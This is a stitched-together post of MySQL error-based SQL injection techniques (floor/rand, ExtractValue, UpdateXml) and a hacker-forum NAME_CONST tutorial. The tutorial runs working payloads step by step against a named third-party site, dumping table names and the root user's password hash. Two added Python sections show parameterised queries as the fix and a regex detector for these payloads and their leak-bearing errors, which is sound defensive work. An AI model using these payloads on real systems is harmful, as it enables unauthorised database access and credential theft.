
MySQL: three error-based injection techniques using floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Errors via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To query other data, replace the version() expression with the desired subquery.
For example, to retrieve the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id = 1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
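
All three techniques above depend on the same two application defects: untrusted input is spliced into the SQL string, and the database driver's error text is echoed back to the client. The following is an added example, not code from the original post; it uses Python's built-in sqlite3 as a stand-in for MySQL (so the database error text differs from the MySQL messages shown above, but the point, that the error surfaces only when input is concatenated, is the same). The `article` and `admin` tables are constructed to mirror the ones in the post, and `handle_request` is a hypothetical web-layer wrapper.

```python
import sqlite3

# Constructed sample schema mirroring the post's `article` and `admin` tables.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER, title TEXT, content TEXT);
        INSERT INTO article VALUES (1, 'test', 'do it');
        CREATE TABLE admin (id INTEGER, user TEXT, pass TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'admin888');
    """)
    return conn

# The ExtractValue payload from section 2, used here only as test input.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"

def fetch_article_concat(conn, user_input):
    # VULNERABLE: the input becomes part of the SQL text and is parsed as SQL.
    sql = "SELECT id, title, content FROM article WHERE id = " + user_input
    return conn.execute(sql).fetchall()

def fetch_article_param(conn, user_input):
    # SAFE: the driver binds the value; it is compared as data, never parsed as SQL.
    sql = "SELECT id, title, content FROM article WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()

def handle_request(conn, user_input, query_fn):
    """Hypothetical web layer: the driver's error text must never reach the client.

    On failure the client gets a generic message; the detailed error is kept
    server-side (returned under 'log' here so the demo can inspect it).
    """
    try:
        rows = query_fn(conn, user_input)
        return {"status": 200, "rows": rows}
    except sqlite3.Error as exc:
        return {"status": 500, "body": "internal error", "log": str(exc)}

if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, "1", fetch_article_param))          # normal lookup succeeds
    print(handle_request(db, PAYLOAD, fetch_article_concat))     # DB error, hidden from client
    print(handle_request(db, PAYLOAD, fetch_article_param))      # no error, simply no rows
```

With concatenation the payload reaches the SQL parser and the database raises an error; on MySQL that error message is exactly the channel the post uses to read `admin888`. With a bound parameter the same input is compared against the `id` column as a literal and matches nothing, and because `handle_request` only returns a generic message there is nothing to read even if a query does fail.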



More collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.

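
Every technique in this post, the floor/group-by trick, ExtractValue, UpdateXml and NAME_CONST, has a distinctive request-side signature and a distinctive error-message signature, which makes them straightforward to detect in web access logs and database error logs. The following is an added example, not code from the original post or from any tool it mentions: a small Python detector that flags the four request patterns (after URL decoding) and extracts the leaked value from the three error-message shapes quoted in the post. The sample log lines are constructed for the demo and are not from a real system.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures: the error-based primitives used in this post.
REQUEST_PATTERNS = {
    "floor_group_by": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*?group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml":    re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const":   re.compile(r"\bname_const\s*\(", re.I),
}

# Error-side signatures: the MySQL messages that carry the leaked value.
ERROR_PATTERNS = {
    "duplicate_group_key": re.compile(r"Duplicate entry '(.*?)' for key 'group_key'"),
    "xpath_syntax":        re.compile(r"XPATH syntax error: '(.*?)'"),
    "duplicate_column":    re.compile(r"Duplicate column name '(.*?)'"),
}

def classify_request(raw_query_string):
    """Return the signature names matched by a (possibly URL-encoded) query string."""
    decoded = unquote_plus(raw_query_string)   # '+' and %XX both become plain text
    return [name for name, pat in REQUEST_PATTERNS.items() if pat.search(decoded)]

def extract_leak(error_text):
    """Return (signature, leaked_value) for a known leak-bearing error, else None."""
    for name, pat in ERROR_PATTERNS.items():
        m = pat.search(error_text)
        if m:
            return name, m.group(1)
    return None

def scan_access_log(lines):
    """Map each suspicious 'METHOD path status' line to the signatures it matched."""
    hits = {}
    for line in lines:
        parts = line.split(" ")
        path = parts[1] if len(parts) > 1 else line
        query = path.partition("?")[2]
        matched = classify_request(query)
        if matched:
            hits[line] = matched
    return hits

# Constructed sample access-log lines, modelled on the requests in this post.
SAMPLE_ACCESS_LOG = [
    "GET /detail.php?id=1 200",
    "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) 500",
    "GET /detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- 500",
    "GET /detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) 500",
]

# Constructed sample database error lines, in the shapes quoted in this post.
SAMPLE_DB_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "Error: Duplicate column name 'com_admanage'",
    "ERROR 1146 (42S02): Table 'shop.articles' doesn't exist",   # benign: no leak pattern
]

if __name__ == "__main__":
    for line, sigs in scan_access_log(SAMPLE_ACCESS_LOG).items():
        print("SUSPICIOUS", sigs, line)
    for err in SAMPLE_DB_ERRORS:
        print("LEAK" if extract_leak(err) else "ok  ", extract_leak(err), err)
```

The request patterns are deliberately loose (whitespace and case insensitive) because these payloads are routinely wrapped in comments and mixed case; the error patterns are the other half of the picture, since a `Duplicate entry ... for key 'group_key'` or `XPATH syntax error` in the database log that coincides with a flagged request is strong evidence that data actually left the database, not just that someone tried.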